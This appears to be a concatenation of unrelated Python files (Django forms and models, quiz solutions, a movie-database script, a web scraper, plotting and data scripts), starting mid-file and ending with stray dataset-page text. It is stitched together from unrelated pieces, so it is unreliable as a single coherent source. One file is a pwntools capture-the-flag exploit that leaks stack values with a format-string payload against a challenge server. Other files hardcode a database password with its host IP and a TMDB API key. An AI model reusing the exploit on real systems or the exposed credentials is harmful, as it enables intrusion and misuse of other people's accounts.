error_messages={
'require': '用户名不能为空!',
'min_length': '用户名不能少于4个字符!',
'max_length': '用户名最多不能超过10个字符!'
})
password = forms.CharField(required=True, min_length=6, max_length=16,
error_messages={
'require': '密码不能为空!',
'min_length': '密码不能少于6位!',
'max_length': '密码不能超过16位!'
})
udesc = forms.CharField(required=True, min_length=5,
error_messages={
'require': '自我描述是必填项!',
'min_length': '自我描述不能少于5个字符!',
})
sex = forms.IntegerField(required=True)
head_img = forms.ImageField(required=False)
class AddArticle(forms.Form):
"""添加文章检验"""
title = forms.CharField(min_length=5, max_length=30, required=True,
error_messages={
'required': '文章标题必填!',
'min_length': '标题不能少于5个字符!',
'max_length': '标题不能超过30个字符!'
})
desc = forms.CharField(min_length=20, max_length=100, required=True,
error_messages={
'required': '文章描述必填!',
'min_length': '描述不能少于20个字符!',
'max_length': '描述不能超过100个字符!'
})
content = forms.CharField(required=True,
error_messages={
'required': '文章内容必填!'
})
icon = forms.ImageField(required=True,
error_messages={
'required': '文章首图必选!'
})
art_type = forms.CharField(required=True,
error_messages={
'required': '请为你的文章选个类型吧!'
})
class EditArticle(forms.Form):
"""添加文章检验"""
title = forms.CharField(min_length=5, max_length=30, required=True,
error_messages={
'required': '文章标题必填!',
'min_length': '标题不能少于5个字符!',
'max_length': '标题不能超过30个字符!'
})
desc = forms.CharField(min_length=20, max_length=100, required=True,
error_messages={
'required': '文章描述必填!',
'min_length': '描述不能少于20个字符!',
'max_length': '描述不能超过100个字符!'
})
content = forms.CharField(required=True,
error_messages={
'required': '文章内容必填!'
})
icon = forms.ImageField(required=False)
art_type = forms.CharField(required=True,
error_messages={
'required': '请为你的文章选个类型吧!'
})
class CatType(forms.Form):
type_name = forms.CharField(max_length=20, required=True,
error_messages={
'require': '类型名不能为空!',
'max_length': '类型名不能超过20个字符!'
})
f_type_id = forms.CharField(required=False)
class UserInfo(forms.Form):
username = forms.CharField(max_length=31, required=True,min_length=4,
error_messages={
'require': '用户名不能为空!',
'max_length': '用户名不能超过30个字符!',
'min_length': '用户名不能少于4个字符!'
})
password = forms.CharField(required=False, min_length=6, max_length=16,
error_messages={
'require': '密码不能为空!',
'max_length': '密码不能超过16个字符!',
'min_length': '密码不能少于4个字符!'
})
udesc = forms.CharField(required=False)
sex = forms.CharField(required=True)
head_img = forms.ImageField(required=False)
birth = forms.DateField(required=False)
|
DATA_DIR = './data/'
DATA_SOURCE_FILE = 'source.csv'
DATA_SAVE_FILE = 'dataset.pickle'
DB_USER = 'ethan'
DB_PASS = 'qwerasdf'
DB_HOST = '120.76.126.214'
DB_NAME = 'soccer'
TREND_MAX_HOUR = 6
NUM_LABELS = 8
FEATURE_SIZE = TREND_MAX_HOUR * 12 * 6 + 2
|
from django.urls import path
from . import views
app_name = "exhibition"
urlpatterns = [
path('init/', views.InitialExhibition.as_view()),
path('exhibition/', views.Exhibition.as_view()),
path('exhibition/detail/artwork/', views.ExhibitionDetailByArtwork.as_view()),
path('exhibition/view/', views.ExhibitionView.as_view()),
]
|
# NO IMPORTS!
##################################################
### Problem 1: batch
##################################################
def batch(inp, size):
""" Return a list of batches, per quiz specification """
inp = list(inp)
batches = []
current_batch = []
current_sum = 0
for elem in inp:
current_batch.append(elem)
current_sum += elem
if current_sum >= size:
batches.append(current_batch)
current_sum = 0
current_batch = []
if len(current_batch) > 0:
batches.append(current_batch)
return batches
##################################################
### Problem 2: order
##################################################
def order(inp):
""" Return an ordered list of string, per quiz specification """
output = []
while len(inp) > 0:
first_letter = inp[0][0]
temp_input = []
for word in inp:
if word[0]==first_letter:
output.append(word)
else:
temp_input.append(word)
inp = temp_input
return output
##################################################
### Problem 3: path_to_happiness
##################################################
def path_to_happiness(field):
""" Return a path through field of smiles that maximizes happiness """
rows = field["nrows"]
cols = field["ncols"]
smiles = field["smiles"]
max_smiles = []
max_paths = []
for row in range(rows):
max_paths.append([row])
max_smiles.append(smiles[row][0])
for col in range(1,cols): #For each successive column, find max path from max_paths and max_smiles
temp_max_smiles = max_smiles[:]
temp_max_paths = max_paths[:]
for row in range(rows):
max_prev_row_smiles = 0 #Maximum path of previous column
max_prev_row = row #Previous row with maximum smiles
for prev_row in range(row-1,row+2):
if 0 <= prev_row < rows:
if temp_max_smiles[prev_row] > max_prev_row_smiles:
max_prev_row_smiles = temp_max_smiles[prev_row]
max_prev_row = prev_row
max_smiles[row] = temp_max_smiles[max_prev_row] + smiles[row][col]
max_paths[row] = temp_max_paths[max_prev_row] + [row]
#print(str(max_paths)+"\n")
max_smiles_total = 0
max_smiles_path = []
for row in range(rows):
if max_smiles[row] > max_smiles_total:
max_smiles_total = max_smiles[row]
max_smiles_path = max_paths[row]
return max_smiles_path
# rows = field["nrows"]
# max_happy = 0
# max_happy_path = []
# to_check = []
# checked = set()
# current_ind = 0
#
# for r in range(rows):
# to_check.append([r])
#
# while current_ind < len(to_check):
# current_path = to_check[current_ind]
# current_sum = 0
# if len(current_path) == field["ncols"]:
# for col in range(len(current_path)):
# current_sum += field["smiles"][current_path[col]][col]
# if current_sum > max_happy:
# max_happy = current_sum
# max_happy_path = current_path
# else:
# last_node = current_path[-1]
# for next_node in range(last_node-1,last_node+2):
# if 0 <= next_node < rows:
# to_check.append(current_path + [next_node])
# current_ind += 1
# return max_happy_path
|
from django.db import models
from django.contrib import admin
# Create your models here.
class MyPhoto(models.Model):
title = models.CharField(max_length=250)
comment = models.TextField()
detail_info = models.TextField()
upload_time = models.DateField()
photo = models.FileField(upload_to='photo')
class MyPhotoAdmin(admin.ModelAdmin):
list_display = ('upload_time', 'title', 'detail_info')
admin.site.register(MyPhoto, MyPhotoAdmin) |
import httplib2
import os
import xlwt
import xlrd
import tmdbsimple as tmdb
from xlutils.copy import copy
from Movie import Movie, get_image
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
# Not really sure what this is, how Google documentation coded it
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# Flix with Friends special variables
# Creds stored at ~/.credentials/sheets.googleapis.flix-with-friends.json
SCOPES = 'https://www.googleapis.com/auth/spreadsheets'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Flix with Friends'
tmdb.API_KEY = 'b299f0e8dce095f8ebcbae6ab789005c'
# GOOGLE_DOC_FILE = 'GoogleDocDB.xlsx'
GOOGLE_DOC_FILE = 'testing.xlsx'
class Database:
global location
global docID
def __init__(self, FN = None):
self.fileName = ''
self.dictionary = [] # cellular array of Excel file
self.movies = [] # array of movies as class Movies
self.fileName = FN
self.listGenres = []
self.MISSING_DATA = 'N/A'
self.spreadsheetID = ''
self.oldest_year = 3000
self.friends = []
if FN is not None:
self.loadDB()
def loadDB(self):
self.createDictionary()
# Add Movies to movie list
for movie in self.dictionary:
self.addMovie(Movie(movie))
self.listGenres = sorted(self.listGenres)
def createDictionary(self):
# This method converts all the data in the excelDB into a Listed PY dictionary
# Access data by self.dictionary[row]['columnName']
workbook = xlrd.open_workbook(self.fileName, on_demand=True)
worksheet = workbook.sheet_by_index(0)
first_row = [] # The row where we stock the name of the column
for col in range(worksheet.ncols):
first_row.append(worksheet.cell_value(0, col))
# transform the workbook to a list of dictionaries
for row in range(1, worksheet.nrows):
elm = {}
for col in range(worksheet.ncols):
elm[first_row[col]] = worksheet.cell_value(row, col)
self.dictionary.append(elm)
def updateMovieDB(self, movie, row):
# This method updates all columns of a single movie in the DB
rb = xlrd.open_workbook(self.fileName) # Open the excel file
wb = copy(rb) # make a writeable copy of the open excel file
w_sheet = wb.get_sheet(0) # read the frist sheet to write to
search = tmdb.Search() # Setup search to run API query
response = search.movie(query = movie) # Search for movie
i = 0
for s in search.results: # for loop return first search result FIXME
i = 1 + i
if i == 1:
titleID = s['id']
daMovie = tmdb.Movies(titleID)
response = daMovie.info()
# Get Genres into one line
genreResult = response['genres']
gen = ''
for i in range(0, len(genreResult)):
gen += genreResult[i]['name']
if i < (len(genreResult) - 1):
gen += ', '
# Write info to appropriate (row,column)
w_sheet.write(row, 0, response['title'])
w_sheet.write(row, 2, response['runtime'])
if (gen is None) or (len(gen) == 0):
w_sheet.write(row, 3, 'N/A')
else:
w_sheet.write(row, 3, gen)
w_sheet.write(row, 4, response['release_date'])
w_sheet.write(row, 5, response['vote_average'])
w_sheet.write(row, 6, response['overview'])
w_sheet.write(row, 7, titleID)
if (response['poster_path'] is None) or (len(response['poster_path']) == 0):
w_sheet.write(row, 8, 'N/A')
else:
w_sheet.write(row, 8, response['poster_path'])
if i == 0: # If no search results
print(movie, self.MISSING_DATA) # Print to console
w_sheet.write(row, 2, self.MISSING_DATA) #runtime
w_sheet.write(row, 3, self.MISSING_DATA) # genres
w_sheet.write(row, 4, self.MISSING_DATA) # release date
w_sheet.write(row, 5, '0') # vote count
w_sheet.write(row, 6, self.MISSING_DATA) # overview
w_sheet.write(row, 7, '0') # TMDB ID number
w_sheet.write(row, 8, self.MISSING_DATA) # poster path
wb.save(self.fileName) # Save DB edits
def update(self):
# Updates all movies' data in DB
p = len(self.dictionary)
for i, Movie in enumerate(self.dictionary):
self.updateMovieDB(Movie['Title'], i + 1)
# Display Percentage to console
print('Percentage Complete: {0:.0f} %'.format(i / p * 100))
print('Percentage Complete: 100 %')
print('Database Update Complete')
def addMovie(self, MOVIE):
for g in MOVIE.genres:
if g not in self.listGenres:
if g != '' and g != self.MISSING_DATA:
(self.listGenres).append(g)
if MOVIE.release_date[:4] < str(self.oldest_year):
self.oldest_year = int(MOVIE.release_date[:4])
for v in MOVIE.viewers:
if v not in self.friends:
if v != '':
self.friends.append(v)
self.movies.append(MOVIE)
def newMovie(self, movie_title):
# Add a new movie just with a movie title
self.updateMovieDB(movie_title, len(self.movies) + 1)
get_image(self.movies[-1].poster_path, self.movies[-1].title)
self.loadDB()
# The following are functions if info is being pulled from a Google Sheet
def get_credentials(self):
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns: Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'sheets.googleapis.flix-with-friends.json')
store = Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def get_google_doc(self, sheetID):
# Run Google OAuth2
credentials = self.get_credentials()
http = credentials.authorize(httplib2.Http())
discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'
'version=v4')
service = discovery.build('sheets', 'v4', http=http,
discoveryServiceUrl=discoveryUrl)
# Pull data from the Google Sheet
# self.spreadsheetID = '1OPg5wtyTFglYPGNYug4hDbHGGfo_yP9HOMRVjT29Lf8'
docID = self.spreadsheetID = sheetID
rangeName = 'Sheet1!A:I'
result = service.spreadsheets().values().get(
spreadsheetId=self.spreadsheetID, range=rangeName).execute()
values = result.get('values', [])
# Add values to the Excel sheet
book = xlwt.Workbook(encoding="utf-8")
sheet1 = book.add_sheet("Sheet 1")
if not values:
print('No data found.')
else:
i = 0
for row in values:
sheet1.write(i, 0, row[0])
sheet1.write(i, 1, row[1])
sheet1.write(i, 2, row[2])
sheet1.write(i, 3, row[3])
sheet1.write(i, 4, row[4])
sheet1.write(i, 5, row[5])
sheet1.write(i, 6, row[6])
sheet1.write(i, 7, row[7])
sheet1.write(i, 8, row[8])
i += 1
book.save(GOOGLE_DOC_FILE)
self.fileName = Database.location = GOOGLE_DOC_FILE
self.loadDB()
def upload_google_doc(self):
# Run Google OAuth2
credentials = self.get_credentials()
http = credentials.authorize(httplib2.Http())
discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'
'version=v4')
service = discovery.build('sheets', 'v4', http=http,
discoveryServiceUrl=discoveryUrl)
# self.spreadsheetId = '1OPg5wtyTFglYPGNYug4hDbHGGfo_yP9HOMRVjT29Lf8'
# Open the Excel sheet to read in data
workbook = xlrd.open_workbook(self.fileName, on_demand=True)
worksheet = workbook.sheet_by_index(0)
# transform the workbook to a 2D list
values = []
for row in range(worksheet.nrows):
elm = []
for col in range(worksheet.ncols):
elm.append(worksheet.cell_value(row, col))
values.append(elm)
# Upload values to the Google Sheet
body = {
'values': values
}
range_name = 'Sheet1!A1'
result = service.spreadsheets().values().update(
spreadsheetId=self.spreadsheetID, range=range_name,
valueInputOption='USER_ENTERED', body=body).execute() # USER_ENTERED or RAW
if __name__ == "__main__":
db = Database()
doc_id = '1OPg5wtyTFglYPGNYug4hDbHGGfo_yP9HOMRVjT29Lf8'
db.get_google_doc(doc_id)
for movie in db.movies:
print(movie.title)
# db.newMovie('top gun')
# db.update()
# db.upload_google_doc()
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
flightpath.py
==============
FlightPath not in active use, easier to directly create the eye-look-up array,
as done in mm0prim2.py and use quiver plots to debug the path.
"""
import numpy as np, logging, os
log = logging.getLogger(__name__)
from opticks.ana.view import View
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.patches import FancyArrowPatch
from mpl_toolkits.mplot3d import proj3d
class Arrow3D(FancyArrowPatch):
def __init__(self, xs, ys, zs, *args, **kwargs):
FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)
self._verts3d = xs, ys, zs
def draw(self, renderer):
xs3d, ys3d, zs3d = self._verts3d
xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)
self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))
FancyArrowPatch.draw(self, renderer)
class FlightPath(object):
"""
See optickscore/FlightPath.hh
"""
FILENAME = "flightpath.npy"
def __init__(self):
self.views = []
def as_array(self):
log.info(" views %s " % len(self.views) )
a = np.zeros( (len(self.views), 4, 4), dtype=np.float32 )
for i, v in enumerate(self.views):
a[i] = v.v
pass
return a
def save(self, dir_="/tmp"):
path = os.path.join(dir_, self.FILENAME)
a = fp.as_array()
log.info("save %s to %s " % (repr(a.shape), path ))
np.save(path, a )
return a
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
fp = FlightPath()
dtype = np.float32
f = np.linspace(0, 1, 10, dtype=dtype)[:-1] # skip last to avoid repeating seam angle
t = f*2*np.pi
n = len(f)
eye = np.zeros( [n,3], dtype=dtype)
eye[:,0] = np.cos(t)
eye[:,1] = np.sin(t)
eye[:,2] = 2*f-1
look = np.zeros( [n,3], dtype=dtype )
look[:-1] = eye[1:]
look[-1] = eye[0]
gaze = look - eye
up = np.zeros( [n,3], dtype=dtype )
up[:] = [0,0,1]
v = np.zeros( (n,4,4), dtype=np.float32)
v[:,0,:3] = eye
v[:,1,:3] = look
v[:,2,:3] = up
np.save("/tmp/flightpath.npy", v )
plt.ion()
fig = plt.figure(figsize=(6,5.5))
plt.title("flightpath")
ax = fig.add_subplot(111, projection='3d')
sz = 3
ax.set_ylim([-sz,sz])
ax.set_xlim([-sz,sz])
ax.plot( eye[:,0], eye[:,1], eye[:,2] )
fig.show()
"""
for i in range(n):
a = Arrow3D([eye[i,0], gaze[i,0]],
[eye[i,1], gaze[i,1]],
[eye[i,2], gaze[i,2]], mutation_scale=20,
lw=3, arrowstyle="-|>", color="r")
ax.add_artist(a)
pass
"""
|
from django.conf.urls import patterns, url, include
urlpatterns = patterns(
'',
url(r'^', include('client.urls_api', namespace='companies')),
)
|
# -*- coding: utf-8 -*-
'''
Created on Thu Jun 6 20:48:32 2019
@author: HP
'''
import math
class Node:
def __init__(self,key):
self.k=key
self.d=math.inf
self.parent=None
self.color="white"
self.adj=[]
def insert(self,node):
self.adj.append(node)
g = { 'a' : ['c'], 'b' : ['c', 'e'], 'c' : ['a', 'b', 'd', 'e'], 'd' : ['c'], 'e' : ['c', 'b'], 'f' : [] }
list=[]
for key in g:
new_node=Node(key)
list.append(new_node)
for i in list:
val=i.k
for j in g[val]:
ind=ord(j)-ord('a')
i.insert(list[ind])
open_list=[]
def BFS(s):
open_list.append(s)
s.color="gray"
s.d=0
while(len(open_list)>0):
node=open_list[0]
for adj in node.adj:
if adj.color=="white":
adj.parent=node
adj.d=node.d+1
open_list.append(adj)
adj.color="gray"
node.color="black"
open_list.remove(node)
BFS(list[0])
for i in list:
print(i.d)
|
def readFromFile(txtFile):
names = {}
with open(txtFile,'r') as open_file:
all_text = open_file.read().split('\n')
for name in all_text:
if name not in names:
names[name] = 1
elif name in names:
names[name] += 1
print(names)
if __name__ == "__main__":
txtFile = str(input("Please enter the name of the text file: "))
readFromFile(txtFile)
|
from tkinter import *
from interface import mainInterface
gris = '#333333'
def lancement():
x = 0.05
main = Tk()
main.config(bg=gris)
main.attributes('-fullscreen', 1)
mainInterface(main, 'chasseur.png')
main.mainloop()
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 22 09:37:45 2019
@author: tpc 02
"""
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
import time
import os
def checarExiste(xpath):
try:
driver.find_element_by_xpath(xpath)
except NoSuchElementException:
return False
return True
os.chdir("C://Users//tpc 02//Desktop")
file1 = open("raspagemunirio4.txt","w")
chrome_path = "C://Users//tpc 02//Desktop//chromedriver.exe"
driver = webdriver.Chrome(chrome_path)
driver.get("http://www.unirio.br/")
time.sleep(0.5)
driver.find_element_by_xpath('//*[@id="searchGadget"]').click()
driver.find_element_by_xpath('//*[@id="searchGadget"]').send_keys("CCET")
driver.find_element_by_xpath('//*[@id="searchGadget_form"]/div/input[2]').click()
## Navega entre os blocos de notícia
lista = driver.find_elements_by_xpath('//*[@id="search-results"]/dl//dt/a')
site = driver.current_url
aux = 0
for bloco in lista:
listaNova = driver.find_elements_by_xpath('//*[@id="search-results"]/dl//dt/a')
listaNova[aux].click()
texto = driver.find_element_by_xpath('//*[@id="content"]').text
# texto = driver.find_element_by_xpath('//*[@id="parent-fieldname-title"]').text
file1.write(texto + '\n \n')
time.sleep(1)
# driver.get(site)
driver.execute_script("window.history.go(-1)")
aux = aux + 1
time.sleep(1)
##
while(checarExiste('//span[@class="next"]/a')):
driver.find_element_by_xpath('//span[@class="next"]/a').click()
time.sleep(1)
lista = driver.find_elements_by_xpath('//*[@id="search-results"]/dl//dt/a')
# site = driver.current_url
aux = 0
for bloco in lista:
listaNova = driver.find_elements_by_xpath('//*[@id="search-results"]/dl//dt/a')
listaNova[aux].click()
texto = driver.find_element_by_xpath('//*[@id="content"]').text
# texto = driver.find_element_by_xpath('//*[@id="parent-fieldname-title"]').text
file1.write(texto + '\n \n')
time.sleep(1)
# driver.get(site)
driver.execute_script("window.history.go(-1)")
aux = aux + 1
time.sleep(1)
file1.close() |
from pwn import *
import time
import sys
def exploit():
raw_input('wait')
buf = '%9$018p'
proc.sendline(buf)
proc.recvuntil('can you tell me their sum?\n')
guess = int(proc.recv(18), 16)
print(guess >> 32)
print(guess & 0x00000000ffffffff)
guess = (guess >> 32) + (guess & 0x00000000ffffffff)
proc.sendline(str(guess))
if __name__ == '__main__':
context.arch = 'amd64'
connect = 'nc shell.angstromctf.com 1235'
connect = connect.split(' ')
if len(sys.argv) > 1:
proc = remote(connect[1], int(connect[2]))
else:
proc = process(['./guessPublic64'], env={'LD_LIBRARY_PATH': './'})
exploit()
proc.interactive()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 24 13:49:41 2020
@author: thomas
"""
import os, sys
import pandas as pd
import time as t
import pathlib
#CONSTANTS
cwd_PYTHON = os.getcwd() + '/'
ReList=['0.5','0.6','0.7','0.8','0.9','1.0','2.0','3.0','4.0','5.0','5.5','6.0','6.5','7.0','7.5',
'10.0','12.5','15.0','17.5','20.0','25.0','30.0','35.0','40.0','50.0','60.0']
# constructs a filepath for the pos data of Re = $Re
def pname(cwd):
#return cwd+"/pd.txt"
#cwd = cwd_PYTHON
return cwd+"/pd.txt"
def GetPosDataLength(cwd):
data = pd.read_csv(pname(cwd),delimiter=' ')
return int((len(data['time'])-1)/2)
#Find missing VTK files for V-shape sims
print('Finding V-shape missing VTKs')
fp = open(cwd_PYTHON+'missingVTK.txt','w')
for Re in ReList:
cwd_Re = cwd_PYTHON+'../SweepRe/Re'+Re+'/'
nDumps = GetPosDataLength(cwd_Re)
cwd_DATA = cwd_Re+'/VTK/'
missingVTK = []
for idx in range(nDumps):
file = pathlib.Path(cwd_DATA+'DATA%05d.vtk'%idx)
if not file.exists ():
print ("File %i does not exist"%idx)
missingVTK.append(idx)
fp.write('%i '%idx)
print('Missing VTK: Re = '+Re)
print(missingVTK)
fp.write('\n')
fp.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.